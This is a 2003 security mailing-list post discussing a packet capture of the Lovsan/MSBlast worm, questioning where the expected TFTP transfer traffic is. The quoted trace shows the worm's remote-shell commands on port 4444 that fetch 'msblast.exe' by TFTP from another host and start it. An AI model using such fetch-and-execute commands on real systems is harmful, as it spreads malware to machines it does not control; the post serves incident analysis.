Lovsan packet traces (was: Re: [Dshield] infocon: yellow)

David Kennedy CISSP david.kennedy at acm.org
Tue Aug 12 04:31:56 GMT 2003


At 04:37 PM 8/11/03 -0700, John Sage wrote:

>T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
>  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
>  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
>  74 2e 65 78 65 0a                                     t.exe.          
>#
>T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
>#
>T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
>  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
>  65 0a                                                 e.              
>exit


Hmmm...has anyone else got a trace to look at?  The various analyses say
that the victim fetches the executable from the attacker via TFTP (which
uses UDP), and some say the worm installs a TFTP server on the attacker to
serve up the executable.  But that's not in this trace.  This looks like
command channel traffic to do the GET but it appears to me to be
attacker:ephemeral vis-a-vis victim:4444.  Where's the port 69 UDP traffic?
 *Is* there port 69 UDP traffic?


-- 
Regards,
                                          /"\
David Kennedy CISSP                       \ / ASCII Ribbon Campaign
Protect what you connect;                  X  Against HTML Mail
Look both ways before crossing the Net.   / \




More information about the list mailing list